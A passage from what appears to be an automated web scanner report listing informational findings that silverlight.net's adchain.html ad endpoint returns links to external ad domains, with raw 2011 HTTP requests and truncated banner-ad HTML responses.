Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:55 GMT
Content-Length: 383


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=715&AdvertiserID=59&BannerID=503&SiteID=6&RandomNumber=1348779494&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_Spread%20728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.573. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:27 GMT
Content-Length: 390


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=719&AdvertiserID=51&BannerID=472&SiteID=6&RandomNumber=257188978&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/ClientUI%20ad2%20(728x90).jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.574. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=476 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wnwczr55budo0sz2rgg0wk45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:07 GMT
Content-Length: 529


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=917188207&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/LDN.120x90.png" /></a>
<p>Practical video tutorials for Silverlight, WPF, AJAX, ASP.NET & more.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=917188207&Keywords=" target="_blank">
Learn More</a>
...[SNIP]...

23.575. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=474 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:58 GMT
Content-Length: 261


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=474&CampaignID=1920&AdvertiserID=2&BannerID=2648&SiteID=2&RandomNumber=2084454856&Keywords=" class="icon_sponsor" target="_blank">
High Performance DataGrid</a>
...[SNIP]...

23.576. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=474 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:05 GMT
Content-Length: 261


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=474&CampaignID=1920&AdvertiserID=2&BannerID=2648&SiteID=2&RandomNumber=1356693589&Keywords=" class="icon_sponsor" target="_blank">
High Performance DataGrid</a>
...[SNIP]...

23.577. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:39 GMT
Content-Length: 396


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=735&AdvertiserID=15&BannerID=450&SiteID=6&RandomNumber=516896624&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_300x250_TFS_greyblu_vault_SM.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.578. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:58 GMT
Content-Length: 377


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=692&AdvertiserID=11&BannerID=324&SiteID=6&RandomNumber=1336124287&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DV-300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.579. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/termsofuse.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:22 GMT
Content-Length: 391


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=736&AdvertiserID=15&BannerID=461&SiteID=6&RandomNumber=472523546&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/1_728x90_TFS_VS2010book_SM.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

23.580. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:58 GMT
Content-Length: 394


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=740&AdvertiserID=4&BannerID=517&SiteID=6&RandomNumber=1516336840&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728-NMG-Blue.gif" width="728" height="90" alt="Advertising - NMG" align="Center" border="0"></a>
...[SNIP]...

23.581. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=39&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:54 GMT
Content-Length: 388


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=39&CampaignID=2014&AdvertiserID=209&BannerID=2753&SiteID=2&RandomNumber=509583680&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/dotfuscator_ad1.0_300x250.gif" width="300" height="250" alt="Advertising - PreEmptive" align="Center" border="0"></a>
...[SNIP]...

23.582. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:38 GMT
Content-Length: 396


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=2084&AdvertiserID=2&BannerID=2808&SiteID=2&RandomNumber=1104460562&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_SL-WPF-DataChart-300x250-April.jpg" width="300" height="250" alt="Advertising - Infragistics" align="Center" border="0"></a>
...[SNIP]...

23.583. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=473 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:51 GMT
Content-Length: 274


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=473&CampaignID=1915&AdvertiserID=12&BannerID=2642&SiteID=2&RandomNumber=1305077725&Keywords=" class="icon_sponsor" target="_blank">
Less Coding, More Logic: ComponentOne</a>
...[SNIP]...

23.584. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=478 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:52 GMT
Content-Length: 538


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=478&CampaignID=1916&AdvertiserID=12&BannerID=2643&SiteID=2&RandomNumber=670832362&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/silverlight_120x90_0111.gif" /></a>
<p>Less coding, more logic: get ahead with easy-to-use Silverlight controls.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=478&CampaignID=1916&AdvertiserID=12&BannerID=2643&SiteID=2&RandomNumber=670832362&Keywords=">
www.componentone.com</a>
...[SNIP]...

23.585. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:13 GMT
Content-Length: 424


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=708&AdvertiserID=70&BannerID=560&SiteID=6&RandomNumber=1536238808&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK2011-TechNet_RON_728x90-Banner-01.jpg" width="728" height="90" alt="Advertising - Diskeeper" align="Center" border="0"></a>
...[SNIP]...

23.586. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=478 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:20 GMT
Content-Length: 538


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=478&CampaignID=1916&AdvertiserID=12&BannerID=2643&SiteID=2&RandomNumber=883316670&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/silverlight_120x90_0111.gif" /></a>
<p>Less coding, more logic: get ahead with easy-to-use Silverlight controls.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=478&CampaignID=1916&AdvertiserID=12&BannerID=2643&SiteID=2&RandomNumber=883316670&Keywords=">
www.componentone.com</a>
...[SNIP]...

23.587. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:59 GMT
Content-Length: 396


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=2084&AdvertiserID=2&BannerID=2808&SiteID=2&RandomNumber=1199433538&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_SL-WPF-DataChart-300x250-April.jpg" width="300" height="250" alt="Advertising - Infragistics" align="Center" border="0"></a>
...[SNIP]...

23.588. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:52 GMT
